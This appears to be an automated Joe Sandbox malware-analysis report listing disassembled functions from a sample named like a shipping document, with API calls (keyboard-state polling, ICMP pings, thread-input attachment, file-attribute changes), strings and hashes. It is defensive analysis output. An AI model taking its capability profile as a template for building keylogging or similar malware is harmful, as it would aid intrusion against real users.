Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: a86fb3bfc82101afee809cf38c34c439520ef5d6845eb82276ac8479a7aa319a
Instruction ID: 7a2cd05c407444565a59e7469fe78798810fb5f61c00c415db295df3992cdaea
Opcode Fuzzy Hash: a86fb3bfc82101afee809cf38c34c439520ef5d6845eb82276ac8479a7aa319a
Instruction Fuzzy Hash: 3BC11C75A04109AFCB14DFA4C884DAEBBF5FF48304B148499F559DB2A1D770ED45CB90

Function 0012541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00125504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00125515
CharNextW.USER32(00000158), ref: 00125544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00125585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0012559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001255AC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 80a0bf1d6da3bb09426bd367a726272c82417fb607c584f921a6c24820eeb93d
Instruction ID: 835ff5977a18ced8f7bfb858c7e17de69500a7ed0a3806ed471a3583d17b08ca
Opcode Fuzzy Hash: 80a0bf1d6da3bb09426bd367a726272c82417fb607c584f921a6c24820eeb93d
Instruction Fuzzy Hash: C4617D30900628FBDF209F54ECC49FE7BBAEF05724F108145FA25A6291D7748AA1DB60

Function 000EFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 000EFAAF
SafeArrayAllocData.OLEAUT32(?), ref: 000EFB08
VariantInit.OLEAUT32(?), ref: 000EFB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 000EFB3A
VariantCopy.OLEAUT32(?,?), ref: 000EFB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 000EFBA1
VariantClear.OLEAUT32(?), ref: 000EFBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 000EFBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000EFBCC
VariantClear.OLEAUT32(?), ref: 000EFBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 000EFBE9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: bc35c2c4bd696c22d9540c78867a6572ed96ea182739296837447dd236d346e2
Instruction ID: 24bc1ce41dca2a0481201c17331de309ab2700f5382b1f4b196153e7d5876729
Opcode Fuzzy Hash: bc35c2c4bd696c22d9540c78867a6572ed96ea182739296837447dd236d346e2
Instruction Fuzzy Hash: 3F415F75A0025AAFCF10EF65DC549FEBBB9EF48344F008069E945A7261DB70A946CBA0

Function 000F9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 000F9CA1
GetAsyncKeyState.USER32(000000A0), ref: 000F9D22
GetKeyState.USER32(000000A0), ref: 000F9D3D
GetAsyncKeyState.USER32(000000A1), ref: 000F9D57
GetKeyState.USER32(000000A1), ref: 000F9D6C
GetAsyncKeyState.USER32(00000011), ref: 000F9D84
GetKeyState.USER32(00000011), ref: 000F9D96
GetAsyncKeyState.USER32(00000012), ref: 000F9DAE
GetKeyState.USER32(00000012), ref: 000F9DC0
GetAsyncKeyState.USER32(0000005B), ref: 000F9DD8
GetKeyState.USER32(0000005B), ref: 000F9DEA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c8177f9a866af7b4d6ece182a3e10092e15b3d0e505e7749390188fca4c8398a
Instruction ID: 4b28f59613e69fddd31d8764ba133ce077b25710ae1ea9ae0c562877344b773f
Opcode Fuzzy Hash: c8177f9a866af7b4d6ece182a3e10092e15b3d0e505e7749390188fca4c8398a
Instruction Fuzzy Hash: BE41D834604BCE69FFB0966088043B5BEE06F12344F18805ADBC656DC2DBE499D8D7E2

Function 0011055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 001105BC
inet_addr.WSOCK32(?), ref: 0011061C
gethostbyname.WSOCK32(?), ref: 00110628
IcmpCreateFile.IPHLPAPI ref: 00110636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001106C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001106E5
IcmpCloseHandle.IPHLPAPI(?), ref: 001107B9
WSACleanup.WSOCK32 ref: 001107BF

Strings

Ping, xrefs: 00110676

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 1c39f3d57886d4a570ee29bb684079e000cb2f0438c62c9dbe0e5094cc998e2d
Instruction ID: 77a28d6b22170d3f8b0650b5878c03d429a64e92986c1ff67f0040d1f5bc1661
Opcode Fuzzy Hash: 1c39f3d57886d4a570ee29bb684079e000cb2f0438c62c9dbe0e5094cc998e2d
Instruction Fuzzy Hash: EC91B035904201AFD725DF15C889F5ABBE1AF48318F1585A9F4A98B6A2C7B0EDC1CF81

Function 00118CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00118CF3

Part of subcall function 000F8E54: _wcslen.LIBCMT ref: 000F8E77

_wcslen.LIBCMT ref: 00118D4E
_wcslen.LIBCMT ref: 00118D9C
_wcslen.LIBCMT ref: 00118DDC
_wcslen.LIBCMT ref: 00118E6E

Strings

stdcall, xrefs: 00118DD6, 00118DDB
winapi, xrefs: 00118D96, 00118D9B
none, xrefs: 00118E65, 00118E6A
cdecl, xrefs: 00118D48, 00118D4D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: cfcc8c38b27afca7d9a15e6e1de1f4f639dab45fd4871e815a0d17d74e0dedd1
Instruction ID: d8fd68ce25e13cb45744ea2869ac7320d32dbe28050689827191242e91e14057
Opcode Fuzzy Hash: cfcc8c38b27afca7d9a15e6e1de1f4f639dab45fd4871e815a0d17d74e0dedd1
Instruction Fuzzy Hash: A5519331A011169BCF18DFACC9518FEB7A6BF65724B618239E825E72C5DB31DE80C790

Function 0011372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00113774
CoUninitialize.OLE32 ref: 0011377F
CoCreateInstance.OLE32(?,00000000,00000017,0012FB78,?), ref: 001137D9
IIDFromString.OLE32(?,?), ref: 0011384C
VariantInit.OLEAUT32(?), ref: 001138E4
VariantClear.OLEAUT32(?), ref: 00113936

Strings

Failed to create object, xrefs: 001137E4, 0011389A
NULL Pointer assignment, xrefs: 0011381E
Invalid parameter, xrefs: 00113865

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 7708af2f48629d684559167cec3d47adc32204c807fe9677d4cd957e9aeade70
Instruction ID: a9f39f95b1980d1927fa2f074c9dc951bb2b612c2987686d955eda3a33a954a8
Opcode Fuzzy Hash: 7708af2f48629d684559167cec3d47adc32204c807fe9677d4cd957e9aeade70
Instruction Fuzzy Hash: 6261D171208301AFD719DF54C849BAEBBE8EF48710F00092DF9959B291C770EE89CB92

Function 00103388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001033CF

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001033F0

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00103504
^ ERROR , xrefs: 0010349E
Line %d (File "%s"):, xrefs: 00103443, 0010345C
Incorrect parameters to object property !, xrefs: 001034AB
Error: , xrefs: 001034D1
"%s" (%d) : ==> %s:, xrefs: 00103522

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 5f03aa864c6cec7c373aa483df69c516859b6158a8204ee5042b7fde3ade30e8
Instruction ID: 782381fae209b27e732a84590e0d3d2179aa5230ad712f236c8a7a89b82886b8
Opcode Fuzzy Hash: 5f03aa864c6cec7c373aa483df69c516859b6158a8204ee5042b7fde3ade30e8
Instruction Fuzzy Hash: 7C517B72900209BADF15EBE0CD42EEEB778AF14340F548165F515721A2EB712F98EBA0

Function 000FB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000FB5FC
_wcslen.LIBCMT ref: 000FB608
_wcslen.LIBCMT ref: 000FB64D
_wcslen.LIBCMT ref: 000FB68C
_wcslen.LIBCMT ref: 000FB6C7

Strings

EXISTS, xrefs: 000FB686, 000FB68B
REMOVE, xrefs: 000FB602, 000FB607
KEYS, xrefs: 000FB647, 000FB64C
APPEND, xrefs: 000FB6C1, 000FB6C6

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 9c6092e94d2a36ff2d42b94bf0b3ebb2b227732e2408a3df163bf856b8881fcf
Instruction ID: 50d76a79dd84da9b61c37afee0cb3ac1a3a07ffdd7280df0a06309600d36d638
Opcode Fuzzy Hash: 9c6092e94d2a36ff2d42b94bf0b3ebb2b227732e2408a3df163bf856b8881fcf
Instruction Fuzzy Hash: AE413932A0012B9BCB206F7DCC905BE77E5BFA0754B244129E621DB680F739CD81EB90

Function 00105393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001053A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00105416
GetLastError.KERNEL32 ref: 00105420
SetErrorMode.KERNEL32(00000000,READY), ref: 001054A7

Strings

READY, xrefs: 00105460, 00105468
INVALID, xrefs: 00105459
UNKNOWN, xrefs: 00105444
NOTREADY, xrefs: 0010544B
READONLY, xrefs: 00105452

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 59e56862b8e27bb635b36c252240e2e8243e9385e417bbd599a0f217a78716fd
Instruction ID: 54e7f827bd20855172b69bbb34711d868c4476124e7cbc33ba24210c047d62e7
Opcode Fuzzy Hash: 59e56862b8e27bb635b36c252240e2e8243e9385e417bbd599a0f217a78716fd
Instruction Fuzzy Hash: 7131A075A00605DFCB10DF68C485AEABBB5EF04305F548069E945DF292EBB0DD86CFA1

Function 00123C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00123C79
SetMenu.USER32(?,00000000), ref: 00123C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00123D10
IsMenu.USER32(?), ref: 00123D24
CreatePopupMenu.USER32 ref: 00123D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00123D5B
DrawMenuBar.USER32 ref: 00123D63

Strings

F, xrefs: 00123D4E
0, xrefs: 00123C54

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 62b4eb45bd5f5a3d6698eff0414eebefbdd68158e1232554ec5e49b67fc888ab
Instruction ID: 6cf524886823b24d4f4970258497726ce6f9bce5b7a9dfa2299e04e33e9f534b
Opcode Fuzzy Hash: 62b4eb45bd5f5a3d6698eff0414eebefbdd68158e1232554ec5e49b67fc888ab
Instruction Fuzzy Hash: EC417C75A01219EFDB24CFA4E844AEA7BB5FF49350F140029FA5697360D774EA21CF90

Function 00123A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00123A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00123AA0
GetWindowLongW.USER32(?,000000F0), ref: 00123AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00123AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00123B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00123BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00123BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00123BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00123BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00123C13

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 55fa148e845dfcc84cfc200026b5090f8aea08e78edb0270f5cf533233fcdf22
Instruction ID: 90131f23d74bb31b8b2027ff9ebb8f5ef477b4cc80dfb3453979e1dd02b91b7f
Opcode Fuzzy Hash: 55fa148e845dfcc84cfc200026b5090f8aea08e78edb0270f5cf533233fcdf22
Instruction Fuzzy Hash: D8618B75900218AFDB10DFA8DC81EEE77B8EF09704F14409AFA15A72A1C774AEA1DF50

Function 000FB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000FB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB165
GetWindowThreadProcessId.USER32(00000000), ref: 000FB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 000FB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000FA1E1,?,00000001), ref: 000FB21D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: b9c81db215050a97c7f5d92d2d01084b1975d1c4f32bc9e79cebef32d34b15ba
Instruction ID: 53a7a5b85390d939f283a8e37a1c7633ce0787851337ebbe45e7c9aa2bfa5b03
Opcode Fuzzy Hash: b9c81db215050a97c7f5d92d2d01084b1975d1c4f32bc9e79cebef32d34b15ba
Instruction Fuzzy Hash: 9931AD71500208BFEB609F28DC48BBEBBA9FB61311F104005FB11D6A90D7B49E85DFA0

Function 000C2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000C2C94

Part of subcall function 000C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000), ref: 000C29DE
Part of subcall function 000C29C8: GetLastError.KERNEL32(00000000,?,000CD7D1,00000000,00000000,00000000,00000000,?,000CD7F8,00000000,00000007,00000000,?,000CDBF5,00000000,00000000), ref: 000C29F0

_free.LIBCMT ref: 000C2CA0
_free.LIBCMT ref: 000C2CAB
_free.LIBCMT ref: 000C2CB6
_free.LIBCMT ref: 000C2CC1
_free.LIBCMT ref: 000C2CCC
_free.LIBCMT ref: 000C2CD7
_free.LIBCMT ref: 000C2CE2
_free.LIBCMT ref: 000C2CED
_free.LIBCMT ref: 000C2CFB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cb28fa29223f707854e4707f680cbd7c0bfc9e835466ea4393001727a926f4cd
Instruction ID: 7a7a5e04cd32553235cb87ca5c9ebe06c9b13b1aa311c8a8d78ce5a7744e93d2
Opcode Fuzzy Hash: cb28fa29223f707854e4707f680cbd7c0bfc9e835466ea4393001727a926f4cd
Instruction Fuzzy Hash: 24115676510108BFCB02EF54D982EDD3BA5FF05350F5145A9FA489FA23DA31EE509B90

Function 00091410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00091459
OleUninitialize.OLE32(?,00000000), ref: 000914F8
UnregisterHotKey.USER32(?), ref: 000916DD
DestroyWindow.USER32(?), ref: 000D24B9
FreeLibrary.KERNEL32(?), ref: 000D251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000D254B

Strings

close all, xrefs: 00091454

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: e531e79ae4e0505b8714d6e175192ca95dc367f7b5e6f55b480e52e6bc04f626
Instruction ID: 70b8d866e9c60447d9e82bb45f1b1f2b60fd7fa3bf4676d1b3e8de0e4bbee430
Opcode Fuzzy Hash: e531e79ae4e0505b8714d6e175192ca95dc367f7b5e6f55b480e52e6bc04f626
Instruction Fuzzy Hash: F1D16931701212CFCB29EF54D599AA9F7A0BF15700F1542AEE54A6B352CB30AC62DFA0

Function 00107DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00107FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00107FC1
GetFileAttributesW.KERNEL32(?), ref: 00107FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 00108005
SetCurrentDirectoryW.KERNEL32(?), ref: 00108017
SetCurrentDirectoryW.KERNEL32(?), ref: 00108060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001080B0

Strings

*.*, xrefs: 00108066

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
